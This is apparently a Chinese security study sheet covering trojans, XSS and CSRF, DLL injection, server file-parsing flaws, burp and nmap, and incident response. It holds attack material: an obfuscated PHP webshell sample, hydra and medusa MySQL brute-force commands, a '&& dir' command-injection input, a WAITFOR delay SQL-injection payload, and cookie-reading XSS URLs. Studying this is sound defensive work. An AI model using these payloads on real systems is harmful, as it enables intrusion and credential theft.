信安小知识-2

1. 摆渡木马?

摆渡木马是一种特殊的木马,其感染机制与 U 盘病毒的传播机制完全一样,只是感染目标计算机后,它会尽量隐蔽自己的踪迹,不会出现普通 U 盘病毒感染后的症状,如更改盘符图标、破坏系统数据、在弹出菜单中添加选项等,它唯一的动作就是扫描系统中的文件数据,利用关键字匹配等手段将敏感文件悄悄写回 U 盘中,一旦这个 U 盘再插入到连接互联网的计算机上,就会将这些敏感文件自动发送到互联网上指定的计算机中。摆渡木马是一种间谍人员定制的木马,隐蔽性、针对性很强,一般只感染特定的计算机,普通杀毒软件和木马查杀工具难以及时发现。

2. 网络木马?

网络木马通常采用记录用户键盘输入、Hook游戏进程API函数等方法获取用户的密码和帐号。窃取的信息一般通过发送电子邮件或向远程脚本程序提交的方式发送给木马作者

3. XSS vs CSRF ?

.XSS 是实现 CSRF 的诸多途径中的一条,但绝对不是唯一的一条。一般习惯上把通过 XSS 来实现的 CSRF 称为 XSRF

XSS 全称“跨站脚本”,是注入攻击的一种。其特点是不对服务器端造成任何伤害(?存储xss?),而是通过一些正常的站内交互途径,例如发布评论,提交含有 JavaScript 的内容文本

CSRF 的全称是“跨站请求伪造”,而 XSS 的全称是“跨站脚本”。看起来有点相似,它们都是属于跨站攻击——不攻击服务器端而攻击正常访问网站的用户,但前面说了,它们的攻击类型是不同维度上的分类

4. Vulnerability scan

缺陷/弱点扫描,Attacker可以扫描目标的漏洞,进行相应攻击

5. Drive-by downloading

Attacker可以给目标公司员工群发一份邮件,如果不小心点击其中的附件,可能就会运行了恶意程序

6. Brute force

暴力破解

7. blowfish

  • BlowFish算法用来加密64位长度的字符串
  • BlowFish算法使用两个盒,一个是unsigned long pbox[18],一个是unsigned long sbox[4*256]

8. 无线网络常用的加密方式

  • WEP (Wired Equivalent Privacy) 有线等效加密
  • WPA (Wi-Fi Protected Access) 商务采用的加密方式
    • WPA-PSK
      • 无线基地台与笔记型计算机必须设定相同的Key,计算机才可以连入基地台。
      • 运用了TKIP (Temporal Key Integrity Protocol)技术,因此比WEP难被破解而更加安全
    • WPA-Enterprise
    • WPA2
      • WPA2顾名思义就是WPA的加强版(AES)
  • EAP-AKA(Extensible Authentication Protocol-Authentication and Key Agreement)协议
    • 3G于WLAN互连认证和密钥分配协议

9. dll应用层注入

把一个DLL文件放到目标进程中。当一个进程的程序不是自己编写的,而我们又需要该程序加载指定的dll,以便进行某些操作,这是就需要dll注入。当一个进程加载dll时,dll被映射到该进程的地址空间。

dll注入的最大目的,进入目标进程的地址空间,这样就可以操作目标进程中的对象了

远程线程注入

  • 通过消息钩子的方法可控性差,不能准确的注入到指定的进程中。而使用远程线程注入的方法可以实现准确地在指定时刻将 DLL 注入到指定的进程中,其可控性较好
    1
    2
    3
    4
    5
    6
    OpenProcess()   //获取已知进程的句柄;
    VirtualAllocEx()   //在进程中申请空间;
    WriteProcessMemory()   //向进程中写入东西;
    GetProcAddress()   (LoadLibrary())//取得函数在DLL中的地址,动态加载DLL;前为UNICODE版本
    CreateRemoteThread()   //在目标进程中创建远程线程;
    CloseHandle()   //关闭句柄;

利用hook注入

  • Hook技术是基于windows消息机制的。如果 给某个消息安装了Hook,当该消息发生时,会先调用Hook函数
    1
    2
    3
    4
    5
    1.进程B中的一个线程准备向一个窗口post一条消息。
    2.系统检查该线程是否已经安装了WH_GETMESSAGE Hook,检查结果为确实安装了这种Hook。
    3.进程B准备调用Hook函数,即GetMsgProc函数。但是该函数在MyDll.dll中,而MyDll.dll并没有加载到进程B。
    4. 进程B加载MyDll.dll。
    5.调用GetMsgProc函数
  • CreateRemoteThread + LoadLibraryA/W
  • SetWindowsHook/SetWindowsHookEx
  • QueueUserAPC + LoadLibraryA

10. 白样本

  • 一般杀软里白色名字表明病毒已经被处理,无高危险度

10.1. 黑样本webshell

1
2
3
4
eval(gzuncompress("xڕR?n?0\x0c=/@???.??M{???l@??Kr?T?,ː?nm?/e%?%??BR||??(6?P&?n??I?k?\x00?+߈?T?T???MX????2??P???\x0aV?4V??X???z,?\x0a?a2C?x?%?gMs?]\x24??ʾ?Z\x24i:??zv??R??ʴsB?i??xxZ<????{??tK\x09hᥩ?3??ƿvbNt?x?q????枓?j??CDnU???<?O??Ż??\x0a?^x?c?'>;V|\x0c??G4W?D9'|2-????+z???4?a??8?Wĩ7????????\x22?t7\x0c?,?h?}?hc1????_UJp??????n?E?e?>??uWF???E|??????0?9\x09??nZ1\x09v???Sna??
?Ӱ\x22D?=_?#|ܔ?⺄]??;???N"));
- gzuncompress是解压字符串的方法

11. 服务器历史上存在的文件解析漏洞

文件解析漏洞,是指Web容器(Apache、nginx、iis等)在解析文件时出现了漏洞,以其他格式执行出脚本格式的效果。从而,黑客可以利用该漏洞实现非法文件的解析

  • Internet Information Services(IIS,互联网信息服务),是由微软公司提供的基于运行Microsoft Windows的互联网基本服务

11.1. apache

多后缀

  • 在Apache1.x,2.x中Apache 解析文件的规则是从右到左开始判断解析,如果后缀名为不可识别文件解析,就再往左判断。
  • 因此可以上传一个test.php.qwea文件绕过验证且服务器依然会将其解析为php。

修复

  • 后缀验证尽量使用白名单的方式,这样即使使用不存在的后缀名,也无法绕过。

11.2. Nginx解析漏洞

11.3. IIS5.x-6.x解析漏洞

  • 形式:www.xxx.com/xx.asp/xx.jpg
  • 原理: 服务器默认会把.asp,.asa目录下的文件都解析成asp文件。
    • 文件名如:xxx.asp;yyy.jpg 的文件,会忽略分号后面的后缀,将该文件当成asp脚本进行解析

1.目前尚无微软官方的补丁,可以通过自己编写正则,阻止上传xx.asp;.jpg类型的文件名。
2.做好权限设置,限制用户创建文件夹。

11.4. ps

Lighttpd目前无此漏洞

12. mysql爆破

  • 扫到3306端口
  • hydra -L /home/chenglee/zidian/user.txt -P /home/chenglee/zidian/wordlist.TXT 192.168.137.133 mysql
    • L指定用户文件
  • medusa -h 192.168.137.133 -u root -P /home/chenglee/zidian/wordlist.TXT -M mysql

12.1. 防御

  • 堡垒机

12.2. www.b.xxx/img?src=http://remote.me/1.jpg看到上面这个URL,你觉得它可能存在哪些漏洞?

  • SSRF
  • XSS
    • 不同源
    • "javascript:alert('yo')"
  • 命令执行
    • $target = $_REQUEST[ 'ip' ];   //low级别中没有进行任何过滤 直接把get的值输出
      • 8.8.8.8 && dir
  • $_GET变量接受所有bai以get方式发送的请du求,及浏览器地址栏中的?之后的内容
  • $_POST变量接受所有dao以post方式发送的请求,例如,一个form以method=post提交,提交后php会处理post过来的全部变量
  • $_REQUEST支持两种方式发送过来的请求,即post和get它都可以接受,显示不显示要看传递方法,get会显示在url中(有字符数限制),post不会在url中显示,可以传递任意多的数据(只要服务器支持)

13. burpsuit模块

  • Proxy——是一个拦截HTTP/S的代量服务器,作为一个在浏览器和目标应用程序之间的中间人,允许你拦截,查看,修改在两个方向上的原始数据流
  • Spider——是一个应用智能感应的网络爬虫,它能完整的枚举应用程序的内容和功能
  • Scanner[仅限专业版]——是一个高级的工具,执行后,它能自动地发现web 应用程序的安全漏洞
  • Intruder——是一个定制的高度可配置的工具,对web应用程序进行自动化攻击,如:枚举标识符,收集有用的数据,以及使用fuzzing 技术探测常规漏洞
  • Repeater——是一个靠手动操作来补发单独的HTTP 请求,并分析应用程序响应的工具
  • Sequencer——是一个用来分析那些不可预知的应用程序会话令牌和重要数据项的随机性的工具
  • Decoder——是一个进行手动执行或对应用程序数据者智能解码编码的工具
  • Comparer——是一个实用的工具,通常是通过一些相关的请求和响应得到两项数据的一个可视化的“差异”

14. 获得域名解析的IP地址?

  • dig
  • ping
  • nslookup
  • host

15. nmap?

Nmap是Linux下的网络扫描和嗅探工具包。
其基本功能有三个:
一是探测一组主机是否在线;
二是扫描主机端口,嗅探其提供的网络服务;
三是推断主机所用的操作系统 。

16. WAITFOR

  • WAITFOR不是SQL的标准语句,是SQL Server中Transact-SQL提供的一个流程控制语句,该语句用作延时注入
    • search.php?type=1);WAITFOR DELAY '0:0:5'--

17. waf

Web Application Firewall(Web应用防护系统)

WAF是通过预设规则来拦截异常请求,

例如,

1.xss payload中的敏感字符< >,和敏感语句script等

2.sql语句中敏感字符 ’ 和select等

3.cc攻击发起的大量异常数据包

  • 攻击者借助代理服务器生成指向受害主机的合法请求,实现DDOS伪装就叫:CC(Challenge Collapsar)

而弱口令密码是则是正常请求,例如密码123456被攻击者猜测到并以此密码通过验证,waf则无法拦截。

18. XSS payload 概念验证(Proof of concept,POC)

18.1. window.location.hash属性介绍

location是javascript里边管理地址栏的内置对象,比如location.href就管理页面的url,用location.href=url就可以直接将页面重定向url。而location.hash则可以用来获取或设置页面的标签值。比如http://domain/#admin的location.hash="#admin"

1
2
3
4
5
6
7
(function() {
    var originalUrl = window.location.href,
        toUrl = originalUrl.indexOf('#') != -1 && originalUrl.split('#')[1];
    if (toUrl) {
        window.location.href = toUrl;
    }
})();
  • 正常: http://www.xxx.com/home#/comments?type=0
  • 攻击
    • http://www.xxx.com/home#javascript:alert(document.cookie);
    • http://www.xxx.com/home#http://www.zzz.com
  • poc
    • ?a=location.hash.substr(1)#setTimeout("hi.eval('prompt(location.href)')",500)

19. 应急响应

1
2
3
ps -aux
w
more .bash_history

20. CSRF漏洞的修复方案

  • 检测HTTP referer 字段同域
  • 在每个请求都添加验证码会严重影响用户的交互使用

21. 如果 https://security.bilibili.com/ 存在 git 源码泄露你应该访问哪一个url进行验证?

  • https://security.bilibili.com/.git/config

22. sqlmap 的 –dump-all

转储所有数据库管理系统的数据库表条目

23. phpinfo()

1
2
3
4
5
6
7
8
9
1. System: 系统信息及版本号
2. Build Date: php 编译时间
3. Configure Command: 配置启动参数
4. Server API: CGI启动接口信息
5. php.ini 路径
6. php编译的过程中是否允许 debug 进行编译
7. 包含以下信息的配置: cgi-fcgi, php core, curl 等
8. php core 的有一些比较重要的信息: allow_url_fopen,allow_url_include,default_mimetype,disable_classes, disable_functions,file_uploads,include_path等
9. PHP Variables: 比较重要的信息: _SERVER["HOME"],_SERVER["HOSTNAME"],_SERVER["PHP_VERSION"],_SERVER["PATH"], _SERVER["PWD"],_SERVER["USER"],_SERVER["SERVER_NAME"],_SERVER["SCRIPT_FILENAME"], _ENV["SCRIPT_NAME"]等

24. 参考